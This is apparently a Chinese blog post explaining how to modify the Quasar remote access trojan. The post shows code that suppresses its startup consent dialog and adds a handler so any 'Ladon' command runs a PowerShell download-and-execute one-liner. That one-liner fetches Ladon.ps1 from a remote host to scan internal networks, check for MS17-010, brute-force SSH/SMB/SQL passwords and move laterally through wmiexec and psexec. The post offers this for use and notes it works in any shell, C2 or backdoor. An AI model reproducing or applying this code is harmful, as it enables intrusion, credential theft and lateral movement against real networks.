简介

修改Quasar加载Ladon一键扫描内网,在CmdShell上使用Ladon命令对内网进行存活主机探测、操作系统识别、端口扫描、服务识别、MS17010高危漏洞检测、SSH\SMB\WMI\IPC\MYSQL\ORACLE\SQL\FTP\NBT网络协议密码爆破，以及内网横向移动wmiexec、psexec、smbexec、sshexec等

QuasarRat

Quasar是一种公开可用的开源远程访问木马（RAT），主要针对Windows操作系统。Quasar通过恶意附件在网络钓鱼电子邮件中分发。
Quasar最初是由GitHub用户 MaxXor 开发，用于合法用途。然而，该工具此后被黑客用于各种网络间谍活动。Quasar于2014年7月首次发布，名为“xRAT 2.0”，后来于2015年8月更名为“Quasar”。https://github.com/quasar/QuasarRAT

去启动框

主窗体，注释以下代码,启动客户端就不会再弹启动框了

    private void ShowTermsOfService()
    {
        //using (var frm = new FrmTermsOfUse())
        //{
        //    frm.ShowDialog();
        //}
        //Thread.Sleep(300);
    }

联动Ladon

SystemHandler.cs第484行，加上以下代码，Url改成自己的PowerLadon,编译即可。当然这段代码放在客户端的下发指令这里也可以。

        else if (input.Substring(0, 5) == "Ladon")
        {
            string LadonUrl = "http://192.168.1.110:800/Ladon.ps1";
            string LadonCmd = "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('" + LadonUrl + "'); " + input + "\"";
            _shell.ExecuteCommand(LadonCmd);
        }

PS：任何shell、C2、RAT、后门不管你怎么称呼，但凡能执行命令的地方，都可用此方法加载Ladon强化自己的工具

执行效果

机器上线后，在CmdShell上使用Ladon命令对内网进行存活主机探测、操作系统识别、端口扫描、服务识别、MS17010高危漏洞检测、SSH\SMB\WMI\IPC\MYSQL\ORACLE\SQL\FTP\NBT网络协议密码爆破，以及内网横向移动wmiexec、psexec、smbexec、sshexec等,更多功能请看Ladon文档。下图为探测C段存活主机，探测B段可使用ip/b参数，当然探测C段也可使用ip/c参数，不是非要/24.

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
7.0版本：http://k8gege.org/Download
7.8版本：K8小密圈

转载声明

K8博客文章随意转载，转载请注明出处！ © K8gege http://k8gege.org